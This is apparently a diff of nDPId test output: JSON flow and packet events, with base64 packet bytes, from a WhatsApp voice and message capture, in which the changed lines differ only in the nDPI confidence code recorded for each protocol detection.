00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432820568947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820568947,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARCI0KCAABrfx5AdF0DZYAhjqZAAMAaiESpEIAAJtQaIETIh2AbQlAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820568947,"flow_last_seen":1432820568947,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820568947,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432820569197,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820569197,"pkt":"ABoRAAACABoRAAABCABFAABIABRAABAROYut\/HkBCggAAQ2W0XQANOG6AQMAGCESpEIAAJtQaIETIh2AbQkAIAAIAAGGsp6wzx5AAgAIAAABTZrC1Qc="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432820569197,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820569197,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARCI0KCAABrfx5AdF0DZYAhjqZAAMAaiESpEIAAJtQaIETIh2AbQlAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1432820569427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820569427,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvB0KCAABszzAMNF0DZYAhkLTAAMAaiESpEIAALo2Lkt1PTwMswhAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820569427,"flow_last_seen":1432820569427,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820569427,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432820569716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820569716,"pkt":"ABoRAAACABoRAAABCABFAABIABZAABAR7RmzPMAwCggAAQ2W0XQANM1bAQMAGCESpEIAALo2Lkt1PTwMswgAIAAIAAGhQp6wzx5AAgAIAAABTZrC1xA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432820569716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820569716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvB0KCAABszzAMNF0DZYAhkLTAAMAaiESpEIAALo2Lkt1PTwMswhAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1432820570006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820570006,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARwL0KCAABHw1PwNF0DZYAhsORAAMAaiESpEIAAFk9lyNgFikbVyNAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570006,"flow_last_seen":1432820570006,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570006,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.79.192","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1432820570428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820570428,"pkt":"ABoRAAACABoRAAABCABFAABIABhAABAR8bcfDU\/ACggAAQ2W0XQANGvgAQMAGCESpEIAAFk9lyNgFikbVyMAIAAIAAGA\/J6wzx5AAgAIAAABTZrC2ZA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432820570428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820570428,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARwL0KCAABHw1PwNF0DZYAhsORAAMAaiESpEIAAFk9lyNgFikbVyNAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432820570876,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820570876,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARs00KCAABHw1dMNF0DZYAhn\/sAAMAaiESpEIAABBswYmYde0br2NAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820570876,"flow_last_seen":1432820570876,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820570876,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1432820571176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820571176,"pkt":"ABoRAAACABoRAAABCABFAABIABpAABAR5EUfDV0wCggAAQ2W0XQANAkRAQMAGCESpEIAABBswYmYde0br2MAIAAIAAGc8p6wzx5AAgAIAAABTZrC3MQ="} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432820571176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571176,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARs00KCAABHw1dMNF0DZYAhn\/sAAMAaiESpEIAABBswYmYde0br2NAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432820571488,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571488,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820571716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFAABIABxAABAR+EMfDUkwCggAAQ2W0XQANGvUAQMAGCESpEIAAOlKSWdSWOu7U1cAIAAIAAGOsJ6wzx5AAgAIAAABTZrC3xA="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432820571716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820571716,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARx00KCAABHw1JMNF0DZYAhta5AAMAaiESpEIAAOlKSWdSWOu7U1dAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820624900,"flow_last_seen":1432820624900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820624900,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432820624900,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820624900,"pkt":"ABoRAAACABoRAAABCABFAAA85gNAAEAGcjAKCAABnlU6Kq8TFGbeopMoAAAAAKACOQiB\/gAAAgQFtAQCCAoABHUrAAAAAAEDAwQ="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820625066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAoACpAABAGiB6eVToqCggAARRmrxMhXWzX3qKTKVAS\/\/8J0AAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432820625066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAo5gRAAEAGckMKCAABnlU6Kq8TFGbeopMpIV1s2FAQOQjQyAAA"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820633802,"flow_last_seen":1432820633802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820633802,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432820633802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820633802,"pkt":"ABoRAAACABoRAAABCABFAAA8gDdAAEAGI\/4KCAABrcDevaUBFGYwrPiRAAAAAKACOQgdJAAAAgQFtAQCCAoABHimAAAAAAEDAwQ="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432820633803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633803,"pkt":"ABoRAAACABoRAAABCABFAAAoADlAABAG1BCtwN69CggAARRmpQHPUwduMKz4klAS\/\/9f4wAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1432820633804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633804,"pkt":"ABoRAAACABoRAAABCABFAAAogDhAAEAGJBEKCAABrcDevaUBFGYwrPiSz1MHb1AQOQgm3AAA"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820681899,"flow_last_seen":1432820681899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820681899,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
